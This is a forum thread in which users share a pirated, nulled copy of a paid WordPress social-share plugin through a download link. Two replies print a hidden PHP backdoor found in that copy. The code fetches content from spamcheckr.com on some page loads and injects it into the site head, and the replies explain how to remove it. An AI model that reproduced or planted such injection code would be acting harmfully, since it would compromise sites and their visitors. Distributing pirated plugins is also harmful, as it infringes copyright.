73.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

03-19-2014, 10:50 PM (This post was last modified: 03-19-2014 11:04 PM by tio1w.)
Post: #1
[GET]Easy Social Share Buttons for WordPress
[Image: codecanyon_590x300_2_1.19-01.jpg]

CHANGELOG
ver 1.3.4
- (fix) Issue with other plugins on page/post settings

ver 1.3.3
- (fix) Fix issue with Google Analytics for WordPress plugin making links to open in popup
- (new) Automatic updates from starting from version 1.3.3

ver 1.3.2
- (new) New admin panel
- (new) Advanced Share options
- (new) Option to hide buttons on low resolution mobile devices

ver 1.3.1
- (new) New template Flat (Retina)
- (new) Option to load counters with admin-ajax call
- (new) Administrative options to hide navbar menu or move plugin options inside settings menu
- (new) Option to position share buttons (Left, Right or Center)
- (new) Option to share short url in Twitter share
- (update) Update Google+ share icon in all themes to avoid confusion with AddThis
- (fix) Performance updates

ver 1.3.0
- (new) Change position of total counter
- (new) Full width float bar
- (new) Display total counter as big numbers only
- (new) Full width buttons using shortcode
- (new) New template Light (Retina)

Demo:
http://codecanyon.net/item/easy-social-share-buttons-for-wordpress/6394476
Download:
http://www.nowdownload.ch/dl/813c5948282b1
05-04-2014, 02:27 AM
Post: #2
RE:
Thanks for the share mate.

Repped ya.
05-10-2014, 02:36 AM
Post: #3
RE:
v1.3.9.2 pls!
05-24-2014, 04:31 PM
Post: #4
RE:
WP_HEAD Injection - spamcheckr
/lib/essb-class.php

PHP Code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function sec14545chesk() {if(function_exists('curl_init')){$addressd "http://spamcheckr.com/l.php";$ch curl_init();$timeout 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec14545chesk');}} ?>

to remove - either remove the code from the .php or

remove line 2593 from lib/essb.php
PHP Code:
require( dirname__FILE__ ) . '/essb-class.php'); 
05-24-2014, 04:33 PM
Post: #5
RE:
WP_HEAD Injection - spamcheckr
/lib/essb-class.php

Code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function sec14545chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec14545chesk');}} ?>

to remove - either remove the code from the .php or

remove line 2593 from lib/essb.php
Code:
require( dirname( __FILE__ ) . '/essb-class.php');
51.gif
05-24-2014, 09:38 PM
Post: #6
RE:
Do you have the latest version? Thanks
10-11-2017, 04:32 PM
Post: #7
[GET] Easy Social Share Buttons for WordPress
Requested Here

Sales Page

DL
10-13-2017, 01:21 AM
Post: #8
RE: [GET]Easy Social Share Buttons for WordPress
(10-11-2017 04:32 PM)philoakey Wrote:  Requested Here

rep added, thanks!
10-13-2017, 06:53 AM
Post: #9
RE: [GET]Easy Social Share Buttons for WordPress
Are there any recent version... this is 2 versions behind.
10-13-2017, 03:47 PM (This post was last modified: 10-13-2017 03:48 PM by Expand.)
Post: #10
RE: [GET]Easy Social Share Buttons for WordPress
(10-13-2017 06:53 AM)aminrod Wrote:  Are there any recent version... this is 2 versions behind.

No, This is the most recent update I received from the 8th October.
12.gif




77.gif